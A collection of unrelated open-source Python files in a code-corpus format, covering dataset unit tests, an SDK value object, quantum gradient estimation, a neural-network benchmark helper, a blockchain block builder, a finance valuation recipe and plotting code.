return FixtureDataType.get(self.request.GET['table_id'])
return None
@property
def headers(self):
return self.table["headers"]
@property
def rows(self):
return self.table["rows"]
class FixtureEditInterface(FixtureInterface):
name = ugettext_noop("Manage Tables")
slug = "edit_lookup_tables"
report_template_path = 'fixtures/manage_tables.html'
@property
def report_context(self):
context = super(FixtureEditInterface, self).report_context
context.update(types=self.data_types)
return context
@property
@memoized
def data_types(self):
return list(FixtureDataType.by_domain(self.domain))
|
tests/components/tasks/gqa_tests.py | aasseman/pytorchpipe | 232 | 31387 | <filename>tests/components/tasks/gqa_tests.py
# -*- coding: utf-8 -*-
#
# Copyright (C) tkornuta, IBM Corporation 2019
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = "<NAME>"
import unittest
from unittest.mock import MagicMock, patch
from os import path
from ptp.components.mixins.io import check_file_existence
from ptp.components.tasks.image_text_to_class.gqa import GQA
from ptp.configuration.config_interface import ConfigInterface
class TestGQA(unittest.TestCase):
def test_training_0_split(self):
"""
Tests the training_0 split.
..note:
Test on real data is performed only if adequate json source file is found.
"""
# Empty config.
config = ConfigInterface()
config.add_config_params({"gqa_training_0": {"split": "training_0", "globals": {"image_height": "gqa_image_height", "image_width": "gqa_image_width"}}})
# Check the existence of test set.
if False: #check_file_existence(path.expanduser('~/data/gqa/questions1.2/train_all_questions'),'train_all_questions_0.json'):
# Create object.
task = GQA("gqa_training_0", config["gqa_training_0"])
# Check dataset size.
self.assertEqual(len(task), 1430536)
# Get sample.
sample = task[0]
else:
processed_dataset_content = [ {'sample_ids': '07333408', 'image_ids': '2375429', 'questions': 'What is on the white wall?', 'answers': 'pipe', 'full_answers': 'The pipe is on the wall.'} ]
# Mock up the load_dataset method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.load_dataset", MagicMock( side_effect = [ processed_dataset_content ] )):
task = GQA("gqa_training_0", config["gqa_training_0"])
# Mock up the get_image method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.get_image", MagicMock( side_effect = [ "0" ] )):
sample = task[0]
# Check sample.
self.assertEqual(sample['indices'], 0)
self.assertEqual(sample['sample_ids'], '07333408')
self.assertEqual(sample['image_ids'], '2375429')
self.assertEqual(sample['questions'], 'What is on the white wall?')
self.assertEqual(sample['answers'], 'pipe')
self.assertEqual(sample['full_answers'], 'The pipe is on the wall.')
def test_validation_split(self):
"""
Tests the validation split.
..note:
Test on real data is performed only if adequate json source file is found.
"""
# Empty config.
config = ConfigInterface()
config.add_config_params({"gqa_validation": {"split": "validation", "globals": {"image_height": "gqa_image_height", "image_width": "gqa_image_width"}}})
# Check the existence of test set.
if False: #check_file_existence(path.expanduser('~/data/gqa/questions1.2'),'val_all_questions.json'):
# Create object.
task = GQA("gqa_validation", config["gqa_validation"])
# Check dataset size.
self.assertEqual(len(task), 2011853)
# Get sample.
sample = task[0]
else:
processed_dataset_content = [ {'sample_ids': '05451384', 'image_ids': '2382986', 'questions': 'Are there blankets under the brown cat?', 'answers': 'no', 'full_answers': 'No, there is a towel under the cat.'} ]
# Mock up the load_dataset method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.load_dataset", MagicMock( side_effect = [ processed_dataset_content ] )):
task = GQA("gqa_validation", config["gqa_validation"])
# Mock up the get_image method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.get_image", MagicMock( side_effect = [ "0" ] )):
sample = task[0]
# Check sample.
self.assertEqual(sample['indices'], 0)
self.assertEqual(sample['sample_ids'], '05451384')
self.assertEqual(sample['image_ids'], '2382986')
self.assertEqual(sample['questions'], 'Are there blankets under the brown cat?')
self.assertEqual(sample['answers'], 'no')
self.assertEqual(sample['full_answers'], 'No, there is a towel under the cat.')
def test_test_dev_split(self):
"""
Tests the test_dev split.
..note:
Test on real data is performed only if adequate json source file is found.
"""
# Empty config.
config = ConfigInterface()
config.add_config_params({"gqa_testdev": {"split": "test_dev", "globals": {"image_height": "gqa_image_height", "image_width": "gqa_image_width"}}})
# Check the existence of test set.
if False: #check_file_existence(path.expanduser('~/data/gqa/questions1.2'),'testdev_all_questions.json'):
# Create object.
task = GQA("gqa_testdev", config["gqa_testdev"])
# Check dataset size.
self.assertEqual(len(task), 172174)
# Get sample.
sample = task[0]
else:
processed_dataset_content = [ {'sample_ids': '20968379', 'image_ids': 'n288870', 'questions': 'Do the shorts have dark color?', 'answers': 'yes', 'full_answers': 'Yes, the shorts are dark.'} ]
# Mock up the load_dataset method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.load_dataset", MagicMock( side_effect = [ processed_dataset_content ] )):
task = GQA("gqa_testdev", config["gqa_testdev"])
# Mock up the get_image method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.get_image", MagicMock( side_effect = [ "0" ] )):
sample = task[0]
# Check sample.
self.assertEqual(sample['indices'], 0)
self.assertEqual(sample['sample_ids'], '20968379')
self.assertEqual(sample['image_ids'], 'n288870')
self.assertEqual(sample['questions'], 'Do the shorts have dark color?')
self.assertEqual(sample['answers'], 'yes')
self.assertEqual(sample['full_answers'], 'Yes, the shorts are dark.')
def test_test_split(self):
"""
Tests the test split.
..note:
Test on real data is performed only if adequate json source file is found.
"""
# Empty config.
config = ConfigInterface()
config.add_config_params({"gqa_test": {"split": "test", "globals": {"image_height": "gqa_image_height", "image_width": "gqa_image_width"}}})
# Check the existence of test set.
if False: #check_file_existence(path.expanduser('~/data/gqa/questions1.2'),'test_all_questions.json'):
# Create object.
task = GQA("gqa_test", config["gqa_test"])
# Check dataset size.
self.assertEqual(len(task), 1340048)
# Get sample.
sample = task[0]
else:
processed_dataset_content = [ {'sample_ids': '201971873', 'image_ids': 'n15740', 'questions': 'Is the blanket to the right of a pillow?', 'answers': '<UNK>', 'full_answers': '<UNK>'} ]
# Mock up the load_dataset method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.load_dataset", MagicMock( side_effect = [ processed_dataset_content ] )):
task = GQA("gqa_test", config["gqa_test"])
# Mock up the get_image method.
with patch( "ptp.components.tasks.image_text_to_class.gqa.GQA.get_image", MagicMock( side_effect = [ "0" ] )):
sample = task[0]
# Check sample.
self.assertEqual(sample['indices'], 0)
self.assertEqual(sample['sample_ids'], '201971873')
self.assertEqual(sample['image_ids'], 'n15740')
self.assertEqual(sample['questions'], 'Is the blanket to the right of a pillow?')
self.assertEqual(sample['answers'], '<UNK>')
self.assertEqual(sample['full_answers'], '<UNK>')
#if __name__ == "__main__":
# unittest.main() |
contrib/frontends/py/nntpchan/__init__.py | majestrate/nntpchan | 233 | 31389 | <filename>contrib/frontends/py/nntpchan/__init__.py
#
# entry for gunicorn
#
from nntpchan.app import app
from nntpchan import viewsp
|
alipay/aop/api/domain/TopicItemVo.py | snowxmas/alipay-sdk-python-all | 213 | 31405 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class TopicItemVo(object):
def __init__(self):
self._desc = None
self._id = None
self._status = None
self._title = None
@property
def desc(self):
return self._desc
@desc.setter
def desc(self, value):
self._desc = value
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def title(self):
return self._title
@title.setter
def title(self, value):
self._title = value
def to_alipay_dict(self):
params = dict()
if self.desc:
if hasattr(self.desc, 'to_alipay_dict'):
params['desc'] = self.desc.to_alipay_dict()
else:
params['desc'] = self.desc
if self.id:
if hasattr(self.id, 'to_alipay_dict'):
params['id'] = self.id.to_alipay_dict()
else:
params['id'] = self.id
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
if self.title:
if hasattr(self.title, 'to_alipay_dict'):
params['title'] = self.title.to_alipay_dict()
else:
params['title'] = self.title
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = TopicItemVo()
if 'desc' in d:
o.desc = d['desc']
if 'id' in d:
o.id = d['id']
if 'status' in d:
o.status = d['status']
if 'title' in d:
o.title = d['title']
return o
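# Hedged round-trip sketch (not part of the generated SDK file); the field
# values below are illustrative only.
if __name__ == '__main__':
    vo = TopicItemVo.from_alipay_dict(
        {'id': 1, 'title': 'demo topic', 'status': 'ONLINE', 'desc': 'example'})
    print(json.dumps(vo.to_alipay_dict()))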
|
exercises/spiral-matrix/spiral_matrix.py | kishankj/python | 1,177 | 31421 | <filename>exercises/spiral-matrix/spiral_matrix.py
def spiral_matrix(size):
pass
|
grove/alpha/jordan_gradient/jordan_gradient.py | mkeshita/grove | 229 | 31427 | import numpy as np
from pyquil import Program
from pyquil.api import QuantumComputer, get_qc
from grove.alpha.jordan_gradient.gradient_utils import (binary_float_to_decimal_float,
measurements_to_bf)
from grove.alpha.phaseestimation.phase_estimation import phase_estimation
def gradient_program(f_h: float, precision: int) -> Program:
"""
Gradient estimation via Jordan's algorithm (10.1103/PhysRevLett.95.050501).
:param f_h: Oracle output at perturbation h.
:param precision: Bit precision of gradient.
:return: Quil program to estimate gradient of f.
"""
# encode oracle values into phase
phase_factor = np.exp(1.0j * 2 * np.pi * abs(f_h))
U = np.array([[phase_factor, 0],
[0, phase_factor]])
p_gradient = phase_estimation(U, precision)
return p_gradient
def estimate_gradient(f_h: float, precision: int,
gradient_max: int = 1,
n_measurements: int = 50,
qc: QuantumComputer = None) -> float:
"""
Estimate the gradient using function evaluation at perturbation, h.
:param f_h: Oracle output at perturbation h.
:param precision: Bit precision of gradient.
:param gradient_max: OOM estimate of largest gradient value.
:param n_measurements: Number of times to measure system.
:param qc: The QuantumComputer object.
:return: Decimal estimate of gradient.
"""
# scale f_h by range of values gradient can take on
f_h *= 1. / gradient_max
# generate gradient program
perturbation_sign = np.sign(f_h)
p_gradient = gradient_program(f_h, precision)
# run gradient program
if qc is None:
qc = get_qc(f"{len(p_gradient.get_qubits())}q-qvm")
p_gradient.wrap_in_numshots_loop(n_measurements)
executable = qc.compiler.native_quil_to_executable(p_gradient)
measurements = qc.run(executable)
# summarize measurements
bf_estimate = perturbation_sign * measurements_to_bf(measurements)
bf_explicit = '{0:.16f}'.format(bf_estimate)
deci_estimate = binary_float_to_decimal_float(bf_explicit)
# rescale gradient
deci_estimate *= gradient_max
return deci_estimate
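# Minimal usage sketch (assumption: quilc and a QVM are running locally so the
# get_qc("...q-qvm") call inside estimate_gradient can execute the program).
# The oracle value 0.25 and the 4-bit precision are illustrative numbers only.
if __name__ == "__main__":
    print("estimated gradient:", estimate_gradient(0.25, 4))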
|
test/benchmark/jvp_conv2d.py | jabader97/backpack | 395 | 31428 | from torch import randn
from torch.nn import Conv2d
from backpack import extend
def data_conv2d(device="cpu"):
N, Cin, Hin, Win = 100, 10, 32, 32
Cout, KernelH, KernelW = 25, 5, 5
X = randn(N, Cin, Hin, Win, requires_grad=True, device=device)
module = extend(Conv2d(Cin, Cout, (KernelH, KernelW))).to(device=device)
out = module(X)
Hout = Hin - (KernelH - 1)
Wout = Win - (KernelW - 1)
vin = randn(N, Cout, Hout, Wout, device=device)
vout = randn(N, Cin, Hin, Win, device=device)
return {
"X": X,
"module": module,
"output": out,
"vout_ag": vout,
"vout_bp": vout.view(N, -1, 1),
"vin_ag": vin,
"vin_bp": vin.view(N, -1, 1),
}
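# Quick smoke-test sketch (not part of the original benchmark helpers): build
# the problem data on CPU and check the convolution output shape.
if __name__ == "__main__":
    problem = data_conv2d("cpu")
    print(problem["output"].shape)  # torch.Size([100, 25, 28, 28])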
|
test/com/facebook/buck/core/module/impl/test_app.py | Unknoob/buck | 8,027 | 31469 | <reponame>Unknoob/buck<filename>test/com/facebook/buck/core/module/impl/test_app.py
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import unittest
class TestApp(unittest.TestCase):
"""
    This is a Python test that allows testing of arbitrary applications.
    The main purpose of using this approach is to provide an ability to run tests on Windows
    (which doesn't support sh_test).
    The command is passed to this test using the `CMD` environment variable.
"""
def test_app(self):
self.assertEquals(0, subprocess.call(os.environ["CMD"].split(" ")))
|
loopchain/blockchain/blocks/v0_5/block_builder.py | windies21/loopchain | 105 | 31481 | <gh_stars>100-1000
# Copyright 2018-current ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""block builder for version 0.5 block"""
from loopchain.blockchain.blocks import BlockProverType
from loopchain.blockchain.blocks.v0_4 import BlockBuilder
from loopchain.blockchain.blocks.v0_5 import BlockHeader, BlockBody, BlockProver
from loopchain.blockchain.types import Hash32
class BlockBuilder(BlockBuilder):
version = BlockHeader.version
BlockHeaderClass = BlockHeader
BlockBodyClass = BlockBody
def _build_transactions_hash(self):
if not self.transactions:
return Hash32.empty()
block_prover = BlockProver(self.transactions.keys(), BlockProverType.Transaction)
return block_prover.get_proof_root()
|
recipes/Python/576708_DVMVersusCAPM/recipe-576708.py | tdiprima/code | 2,023 | 31495 | <gh_stars>1000+
#On the name of ALLAH and may the blessing and peace of Allah
#be upon the Messenger of Allah <NAME>.
#Author : <NAME>
#Date : 07/03/09
#version :2.6.1
"""
This program uses the namedtuple class added to the collections module in Python 2.6.1.
DVMextrapolating, DVMgordonsModel and CAPM are subclasses of namedtuple that provide
the cost of equity, the calculation of the dividend growth g in two different ways,
and the value of the company if the cost of equity Ke is known.
A utility method and try/except statements are used to raise errors.
"""
import math as m
from collections import namedtuple
class MyError:
    """ Demonstrate improper operation on negative number"""
def _negativeNumberException(self,*args):
""" Utility method to raise a negative number exception"""
for item in args:
if item <0:
raise ValueError,\
" <The value %s should be a positive number " % item
class DVMextrapolating(namedtuple('DVMextrapolating','dividend_just_paid,dividend_n_years,n,share_price,Ke'),MyError):
""" DVMeModel class inherits from tuple and MyError class """
#set __slots__ to an empty tuple keep memory requirements low
__slots__ = ()
#Pick Myerror method
_negativeNumberException =MyError._negativeNumberException
@property
def g_extrapolatingModel(self):
""" Compute g using extrapolating """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.dividend_just_paid,self.dividend_n_years,self.n)
return "%2.2f" % ((float(m.pow((self.dividend_just_paid/self.dividend_n_years),(1/float(self.n)))) -1))
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
#division by zero raises ZeroDivisionError exception
except ZeroDivisionError:
raise ZeroDivisionError, "\n<Please check and re-enter the values"
@property
def valueOfShare(self):
""" Compute the share value """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.dividend_just_paid,self.dividend_n_years,self.Ke)
return "%2.2f" % (((self.dividend_just_paid*
(1+float(self.g_extrapolatingModel)))/(self.Ke-float(self.g_extrapolatingModel))))
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
#division by zero raises ZeroDivisionError exception
except ZeroDivisionError:
raise ZeroDivisionError, "\n<Please check and re-enter the values"
@property
def costOfEquity(self):
""" Compute cost of equity using DVM Model """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.dividend_just_paid,self.share_price)
return "%2.1f" % ((((self.dividend_just_paid*
(1+float(self.g_extrapolatingModel))/self.share_price))+ float(self.g_extrapolatingModel))*100)
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
#division by zero raises ZeroDivisionError exception
except ZeroDivisionError:
raise ZeroDivisionError, "\n<Please check and re-enter the values"
def __str__(self):
""" String representation of DVMeModel"""
if self.Ke == None:
return "\n< Extrapolating Growth Model g = %s\n \
\n< Cost of equity Ke = %s \n\
\n< Market value of the share Po = %s" % \
(self.g_extrapolatingModel,(self.costOfEquity+'%'),('$'+ str(self.share_price)))
else:
return "\n< Extrapolating Growth Model g = %s\n \
\n< Cost of equity Ke = %s \n\
\n< Market value of the share Po = %s" % \
(self.g_extrapolatingModel,self.Ke,('$'+ str(self.valueOfShare)))
class DVMgordonsModel(namedtuple('DVMgordonsModel','dividend_just_paid,return_on_equity,dividend_payout,share_price,Ke'),MyError):
""" DVMgModel class inherits from tuple and MyError classes """
#set __slots__ to an empty tuple keep memory requirements low
__slots__ = ()
#Pick Myerror method
_negativeNumberException =MyError._negativeNumberException
@property
def g_gordonsModel(self):
""" Compute g using Gordons growth Model """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.return_on_equity,self.dividend_payout)
return self.return_on_equity * (1-self.dividend_payout)
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
@property
def valueOfShare(self):
""" Compute the share value """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.dividend_just_paid,self.Ke)
return "%2.2f" % (((self.dividend_just_paid*
(1+float(self.g_gordonsModel)))/(self.Ke-self.g_gordonsModel)))
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
#division by zero raises ZeroDivisionError exception
except ZeroDivisionError:
raise ZeroDivisionError, "\n<Please check and re-enter the values"
@property
def costOfEquity(self):
""" Compute cost of equity using DVM Model """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.dividend_just_paid,self.share_price)
return "%2.1f" % ((((self.dividend_just_paid*
(1+float(self.g_gordonsModel)))/(self.share_price))+ float(self.g_gordonsModel))*100 )
#Raise TypeError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
#division by zero raises ZeroDivisionError exception
except ZeroDivisionError:
raise ZeroDivisionError, "\n<Please check and re-enter the values"
def __str__(self):
""" String representation of DVMgModel"""
if self.Ke == None:
return "\n< Gordon's Growth Model g = %s\n \
\n< Cost of equity Ke = %s \n\
\n< Market value of the share Po = %s" % \
(self.g_gordonsModel,(self.costOfEquity+'%'),('$'+ str(self.share_price)))
else:
return "\n< Gordon's Growth Model g = %s\n \
\n< Cost of equity Ke = %s \n\
\n< Market value of the share Po = %s" % \
(self.g_gordonsModel,self.Ke,('$'+ str(self.valueOfShare)))
class CAPM(namedtuple('CAPM','Rf,Beta,Rm'),MyError):
""" CAPM class inherits from tuple and MyError class """
#set __slots__ to an empty tuple keep memory requirements low
__slots__ = ()
#Pick Myerror method
_negativeNumberException =MyError._negativeNumberException
@property
def Ke(self):
""" Compute cost of equity using CAPM model """
try:
#Test for negative numbers input and raise the exception
self._negativeNumberException(self.Rf,self.Beta,self.Rm)
return self.Rf + self.Beta*(self.Rm - self.Rf)
#Raise ValueError if input is not numerical
except TypeError:
print "\n<The entered value is not a number"
def __str__(self):
""" String representation of CAPM"""
return "\n< Ke = %s" % self.Ke+"%"
if __name__ == '__main__':
a = CAPM('Rf','Beta','Rm')
b = [7,0.7,17]
a = a._make(b)
print "\n"+"\4"*43
print a
print "\n"+"\4"*43
c = DVMextrapolating('dividend_just_paid','dividend_n_years','n','share_price','Ke')
d = [0.24,0.1525,4,None,a.Ke/100]
c = c._make(d)
print c
print "\n"+"\4"*43
e = DVMgordonsModel('dividend_just_paid','return_on_equity','dividend_payout','share_price','Ke')
f = [0.18,0.2,0.72,None,0.127]
e = e._make(f)
print e
print "\n"+"\4"*43
g = [0.25,0.17,7,17.50,None]
c = c._make(g)
print c
print "\n"+"\4"*43
h = [0.17,0.3,0.37,1.77,None]
e = e._make(h)
print e
print "\n"+"\4"*43
print
print c.g_extrapolatingModel
print c.costOfEquity
print e.g_gordonsModel
print e.costOfEquity
print "\n"+"\5"*43
m = [None,0.5,0.57,None,None]
e = e._make(m)
print e.g_gordonsModel
##########################################################################################
# c:\Python26>python "C:\Users\<NAME>\Documents\python\DVM_Versus_CAPM7.py"
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#< Ke = 14.0%
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#< Extrapolating Growth Model g = 0.12
#< Cost of equity Ke = 0.14
#< Market value of the share Po = $13.44
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#< Gordon's Growth Model g = 0.056
#< Cost of equity Ke = 0.127
#< Market value of the share Po = $2.68
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#< Extrapolating Growth Model g = 0.06
#< Cost of equity Ke = 7.5%
#< Market value of the share Po = $17.5
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#< Gordon's Growth Model g = 0.189
#< Cost of equity Ke = 30.3%
#< Market value of the share Po = $1.77
#♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦♦
#0.06
#7.5
#0.189
#30.3
#♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣♣
#0.215
#c:\Python26>
##########################################################################################
#Version : Python 3.2
#import math as m
#from collections import namedtuple
#class MyError:
# """ Demonstrate imporper operation on negative number"""
# def _negativeNumberException(self,*args):
# """ Utility method to raise a negative number exception"""
#
# for item in args:
# if item <0:
#
# raise ValueError(" <The value %s should be a positive number " % item)
#
#class DVMextrapolating(namedtuple('DVMextrapolating','dividend_just_paid,dividend_n_years,n,share_price,Ke'),MyError):
# """ DVMeModel class inherits from tuple and MyError class """
#
# #set __slots__ to an empty tuple keep memory requirements low
# __slots__ = ()
#
# #Pick Myerror method
# _negativeNumberException =MyError._negativeNumberException
#
# @property
# def g_extrapolatingModel(self):
# """ Compute g using extrapolating """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.dividend_just_paid,self.dividend_n_years,self.n)
# return "%2.2f" % ((float(m.pow((self.dividend_just_paid/self.dividend_n_years),(1/float(self.n)))) -1))
#
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# #division by zero raises ZeroDivisionError exception
# except ZeroDivisionError:
# raise ZeroDivisionError("\n<Please check and re-enter the values")
#
# @property
# def valueOfShare(self):
# """ Compute the share value """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.dividend_just_paid,self.dividend_n_years,self.Ke)
# return "%2.2f" % (((self.dividend_just_paid*
# (1+float(self.g_extrapolatingModel)))/(self.Ke-float(self.g_extrapolatingModel))))
#
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# #division by zero raises ZeroDivisionError exception
# except ZeroDivisionError:
# raise ZeroDivisionError("\n<Please check and re-enter the values")
#
# @property
# def costOfEquity(self):
# """ Compute cost of equity using DVM Model """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.dividend_just_paid,self.share_price)
# return "%2.1f" % ((((self.dividend_just_paid*
# (1+float(self.g_extrapolatingModel))/self.share_price))+ float(self.g_extrapolatingModel))*100)
#
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# #division by zero raises ZeroDivisionError exception
# except ZeroDivisionError:
# raise ZeroDivisionError("\n<Please check and re-enter the values")
#
# def __str__(self):
# """ String representation of DVMeModel"""
#
# if self.Ke == None:
# return "\n< Extrapolating Growth Model g = %s\n \
# \n< Cost of equity Ke = %s \n\
# \n< Market value of the share Po = %s" % \
# (self.g_extrapolatingModel,(self.costOfEquity+'%'),('$'+ str(self.share_price)))
# else:
# return "\n< Extrapolating Growth Model g = %s\n \
# \n< Cost of equity Ke = %s \n\
# \n< Market value of the share Po = %s" % \
# (self.g_extrapolatingModel,self.Ke,('$'+ str(self.valueOfShare)))
#
#class DVMgordonsModel(namedtuple('DVMgordonsModel','dividend_just_paid,return_on_equity,dividend_payout,share_price,Ke'),MyError):
# """ DVMgModel class inherits from tuple and MyError classes """
#
# #set __slots__ to an empty tuple keep memory requirements low
# __slots__ = ()
#
# #Pick Myerror method
# _negativeNumberException =MyError._negativeNumberException
#
# @property
# def g_gordonsModel(self):
# """ Compute g using Gordons growth Model """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.return_on_equity,self.dividend_payout)
# return self.return_on_equity * (1-self.dividend_payout)
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# @property
# def valueOfShare(self):
# """ Compute the share value """
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.dividend_just_paid,self.Ke)
# return "%2.2f" % (((self.dividend_just_paid*
# (1+float(self.g_gordonsModel)))/(self.Ke-self.g_gordonsModel)))
#
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# #division by zero raises ZeroDivisionError exception
# except ZeroDivisionError:
# raise ZeroDivisionError("\n<Please check and re-enter the values")
#
# @property
# def costOfEquity(self):
# """ Compute cost of equity using DVM Model """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.dividend_just_paid,self.share_price)
# return "%2.1f" % ((((self.dividend_just_paid*
# (1+float(self.g_gordonsModel)))/(self.share_price))+ float(self.g_gordonsModel))*100 )
#
# #Raise TypeError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# #division by zero raises ZeroDivisionError exception
# except ZeroDivisionError:
# raise ZeroDivisionError("\n<Please check and re-enter the values")
#
# def __str__(self):
# """ String representation of DVMgModel"""
#
# if self.Ke == None:
#
# return "\n< Gordon's Growth Model g = %s\n \
# \n< Cost of equity Ke = %s \n\
# \n< Market value of the share Po = %s" % \
# (self.g_gordonsModel,(self.costOfEquity+'%'),('$'+ str(self.share_price)))
#
# else:
# return "\n< Gordon's Growth Model g = %s\n \
# \n< Cost of equity Ke = %s \n\
# \n< Market value of the share Po = %s" % \
# (self.g_gordonsModel,self.Ke,('$'+ str(self.valueOfShare)))
#
#class CAPM(namedtuple('CAPM','Rf,Beta,Rm'),MyError):
# """ CAPM class inherits from tuple and MyError class """
#
# #set __slots__ to an empty tuple keep memory requirements low
# __slots__ = ()
#
# #Pick Myerror method
# _negativeNumberException =MyError._negativeNumberException
#
# @property
# def Ke(self):
# """ Compute cost of equity using CAPM model """
#
# try:
# #Test for negative numbers input and raise the exception
# self._negativeNumberException(self.Rf,self.Beta,self.Rm)
# return self.Rf + self.Beta*(self.Rm - self.Rf)
#
# #Raise ValueError if input is not numerical
# except TypeError:
# print("\n<The entered value is not a number")
#
# def __str__(self):
# """ String representation of CAPM"""
#
# return "\n< Ke = %s" % self.Ke+"%"
#
#if __name__ == '__main__':
# a = CAPM('Rf','Beta','Rm')
# b = [7,0.7,17]
# a = a._make(b)
# print("\n"+"\4"*43)
# print(a)
# print("\n"+"\4"*43)
# c = DVMextrapolating('dividend_just_paid','dividend_n_years','n','share_price','Ke')
# d = [0.24,0.1525,4,None,a.Ke/100]
# c = c._make(d)
# print(c)
#
# print("\n"+"\4"*43)
# e = DVMgordonsModel('dividend_just_paid','return_on_equity','dividend_payout','share_price','Ke')
#
# f = [0.18,0.2,0.72,None,0.127]
# e = e._make(f)
# print(e)
# print("\n"+"\4"*43)
# g = [0.25,0.17,7,17.50,None]
# c = c._make(g)
# print(c)
#
# print("\n"+"\4"*43)
# h = [0.17,0.3,0.37,1.77,None]
# e = e._make(h)
# print(e)
#
# print("\n"+"\4"*43)
# print()
# print(c.g_extrapolatingModel)
# print(c.costOfEquity)
# print(e.g_gordonsModel)
# print(e.costOfEquity)
# print("\n"+"\5"*43)
# m = [None,0.5,0.57,None,None]
# e = e._make(m)
# print(e.g_gordonsModel)
|
tutorials/W1D3_MultiLayerPerceptrons/solutions/W1D3_Tutorial1_Solution_d58d2933.py | amita-kapoor/course-content-dl | 473 | 31513 |
"""
At infinite membrane resistance, the neuron does not leak any current out,
and hence it starts firing with the slightest input current.
This shifts the transfer function towards 0, similar to a ReLU activation (centered at 0).
Also, when there is minimal refractory time, the neuron can keep firing
at a high input current, which avoids saturation.
"""; |
arviz/plots/backends/matplotlib/separationplot.py | sudojarvis/arviz | 1,159 | 31540 | <reponame>sudojarvis/arviz
"""Matplotlib separation plot."""
import matplotlib.pyplot as plt
import numpy as np
from ...plot_utils import _scale_fig_size
from . import backend_kwarg_defaults, backend_show, create_axes_grid
def plot_separation(
y,
y_hat,
y_hat_line,
label_y_hat,
expected_events,
figsize,
textsize,
color,
legend,
locs,
width,
ax,
plot_kwargs,
y_hat_line_kwargs,
exp_events_kwargs,
backend_kwargs,
show,
):
"""Matplotlib separation plot."""
if backend_kwargs is None:
backend_kwargs = {}
if plot_kwargs is None:
plot_kwargs = {}
# plot_kwargs.setdefault("color", "C0")
# if color:
